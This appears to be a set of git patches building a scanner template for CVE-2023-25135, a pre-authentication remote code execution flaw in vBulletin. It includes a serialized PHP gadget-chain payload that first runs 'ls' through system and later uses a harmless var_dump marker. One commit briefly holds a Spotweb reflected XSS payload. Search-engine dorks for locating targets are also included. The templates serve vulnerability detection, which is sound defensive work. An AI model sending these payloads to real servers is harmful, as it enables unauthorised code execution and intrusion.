From f2890ae2fac207e3503de76ce91ff90366697768 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 May 2023 22:10:11 +0530 Subject: [PATCH 1/8] Create CVE-2023-25135.yaml --- http/cves/2023/CVE-2023-25135.yaml | 48 ++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 http/cves/2023/CVE-2023-25135.yaml diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml new file mode 100644 index 0000000000..910315d910 --- /dev/null +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -0,0 +1,48 @@ +id: CVE-2023-25135 + +info: + name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. + reference: + - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable + - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py + - https://nvd.nist.gov/vuln/detail/CVE-2023-25135 + - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch + remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-502 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Powered By vBulletin" + google-query: http.component:"vBulletin" + tags: cve,cve2023,vbulletin,rce,kev + +requests: + - raw: + - | + POST /ajax/api/user/save HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + + adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D={{randstr}}&user%5Bpassword%5D={{randstr}}&user%5Bsearchprefs%5D=a%3A2%3A%7Bi%3A0%3BO%3A27%3A%22googlelogin_vendor_autoload%22%3A0%3A%7B%7Di%3A1%3BO%3A32%3A%22Monolog%5CHandler%5CSyslogUdpHandler%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00socket%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A4%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A-1%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A36%3A%22echo+n8ZCwFfp%3A%3A%3B+ls%3B+echo+%3A%3An8ZCwFfp%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A8%3A%22%00%2A%00level%22%3BN%3Bs%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A-1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D&user%5Busername%5D=toto&userfield=&userid=0 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "n8ZCwFfp::" + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 From b3dc6cf70a4380ccb9b90105c21774fd843f5804 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 9 May 2023 22:42:10 +0530 Subject: [PATCH 2/8] change in query --- http/cves/2023/CVE-2023-25135.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 910315d910..006e033842 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -19,8 +19,8 @@ info: metadata: max-request: 1 verified: true - shodan-query: title:"Powered By vBulletin" - google-query: http.component:"vBulletin" + google-query: intext:"Powered By vBulletin" + shodan-query: http.component:"vBulletin" tags: cve,cve2023,vbulletin,rce,kev requests: From 58f7db754fe8771787159082a47571d10bc78053 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 10 May 2023 01:00:43 +0530 Subject: [PATCH 3/8] protocol-update --- http/cves/2023/CVE-2023-25135.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 006e033842..007b9712c7 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -18,12 +18,12 @@ info: cwe-id: CWE-502 metadata: max-request: 1 - verified: true + verified: "true" google-query: intext:"Powered By vBulletin" shodan-query: http.component:"vBulletin" tags: cve,cve2023,vbulletin,rce,kev -requests: +http: - raw: - | POST /ajax/api/user/save HTTP/1.1 From cba7f8b5e5dce238e8b03474ea1732e4b351be38 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 May 2023 17:51:16 +0530 Subject: [PATCH 4/8] changing from system to var_dump --- http/cves/2023/CVE-2023-25135.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 007b9712c7..8307e7677e 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -23,21 +23,21 @@ info: shodan-query: http.component:"vBulletin" tags: cve,cve2023,vbulletin,rce,kev -http: +requests: - raw: - | POST /ajax/api/user/save HTTP/1.1 Content-Type: application/x-www-form-urlencoded - adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D={{randstr}}&user%5Bpassword%5D={{randstr}}&user%5Bsearchprefs%5D=a%3A2%3A%7Bi%3A0%3BO%3A27%3A%22googlelogin_vendor_autoload%22%3A0%3A%7B%7Di%3A1%3BO%3A32%3A%22Monolog%5CHandler%5CSyslogUdpHandler%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00socket%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A4%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A-1%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A36%3A%22echo+n8ZCwFfp%3A%3A%3B+ls%3B+echo+%3A%3An8ZCwFfp%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A8%3A%22%00%2A%00level%22%3BN%3Bs%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A-1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D&user%5Busername%5D=toto&userfield=&userid=0 - + adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0 matchers-condition: and matchers: - type: word part: body words: - - "n8ZCwFfp::" - + - 'string(14)' + - '"CVE-2023-25135"' + condition: and - type: word part: header words: From dc3180fd24892378b31dec96812d05759f4d71b1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 10 May 2023 19:14:55 +0530 Subject: [PATCH 5/8] protocol -update --- http/cves/2023/CVE-2023-25135.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 8307e7677e..61b15d6b3c 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -23,7 +23,7 @@ info: shodan-query: http.component:"vBulletin" tags: cve,cve2023,vbulletin,rce,kev -requests: +http: - raw: - | POST /ajax/api/user/save HTTP/1.1 From 36819b63eb32314279e8b2cc55d22d7364c891a3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 10 May 2023 20:43:56 +0530 Subject: [PATCH 6/8] minor -update --- http/cves/2023/CVE-2023-25135.yaml | 46 +++++++++++++++--------------- 1 file changed, 23 insertions(+), 23 deletions(-) diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 61b15d6b3c..bc569c3251 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -1,47 +1,47 @@ -id: CVE-2023-25135 +id: CVE-2021-40970 info: - name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution - author: iamnoooob,rootxharsh,pdresearch - severity: critical + name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected) + author: theamanrawat + severity: medium description: | - vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. + Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter. + remediation: Fixed in version 1.5.2 reference: - - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable - - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py - - https://nvd.nist.gov/vuln/detail/CVE-2023-25135 - - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch - remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1. + - https://github.com/spotweb/spotweb/ + - https://github.com/spotweb/spotweb/issues/711 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40970 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cwe-id: CWE-502 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-40970 + cwe-id: CWE-79 metadata: - max-request: 1 verified: "true" - google-query: intext:"Powered By vBulletin" - shodan-query: http.component:"vBulletin" - tags: cve,cve2023,vbulletin,rce,kev + shodan-query: title:"SpotWeb - overview" + tags: cve,cve2021,xss,spotweb,unauthenticated http: - raw: - | - POST /ajax/api/user/save HTTP/1.1 + POST /install.php?page=1 HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0 + settingsform[username]=pdteam'+onclick='alert(document.domain) + matchers-condition: and matchers: - type: word part: body words: - - 'string(14)' - - '"CVE-2023-25135"' - condition: and + - "onclick='alert(document.domain)" + - "Spotweb" + - type: word part: header words: - - "application/json" + - "text/html" - type: status status: From 8de6c0cb813645336a0a0e6e77d3f7bf91bbc372 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 10 May 2023 20:45:19 +0530 Subject: [PATCH 7/8] Update CVE-2023-25135.yaml --- http/cves/2023/CVE-2023-25135.yaml | 46 +++++++++++++++--------------- 1 file changed, 23 insertions(+), 23 deletions(-) diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index bc569c3251..61b15d6b3c 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -1,47 +1,47 @@ -id: CVE-2021-40970 +id: CVE-2023-25135 info: - name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected) - author: theamanrawat - severity: medium + name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: critical description: | - Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter. - remediation: Fixed in version 1.5.2 + vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. reference: - - https://github.com/spotweb/spotweb/ - - https://github.com/spotweb/spotweb/issues/711 - - https://nvd.nist.gov/vuln/detail/CVE-2021-40970 + - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable + - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py + - https://nvd.nist.gov/vuln/detail/CVE-2023-25135 + - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch + remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-40970 - cwe-id: CWE-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-502 metadata: + max-request: 1 verified: "true" - shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb,unauthenticated + google-query: intext:"Powered By vBulletin" + shodan-query: http.component:"vBulletin" + tags: cve,cve2023,vbulletin,rce,kev http: - raw: - | - POST /install.php?page=1 HTTP/1.1 - Host: {{Hostname}} + POST /ajax/api/user/save HTTP/1.1 Content-Type: application/x-www-form-urlencoded - settingsform[username]=pdteam'+onclick='alert(document.domain) - + adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0 matchers-condition: and matchers: - type: word part: body words: - - "onclick='alert(document.domain)" - - "Spotweb" - + - 'string(14)' + - '"CVE-2023-25135"' + condition: and - type: word part: header words: - - "text/html" + - "application/json" - type: status status: From 34cbb997e02bc5098f3e82952731749f5cb23341 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 10 May 2023 20:46:40 +0530 Subject: [PATCH 8/8] Update CVE-2023-25135.yaml --- http/cves/2023/CVE-2023-25135.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 61b15d6b3c..c3dc3d40a2 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -27,6 +27,7 @@ http: - raw: - | POST /ajax/api/user/save HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0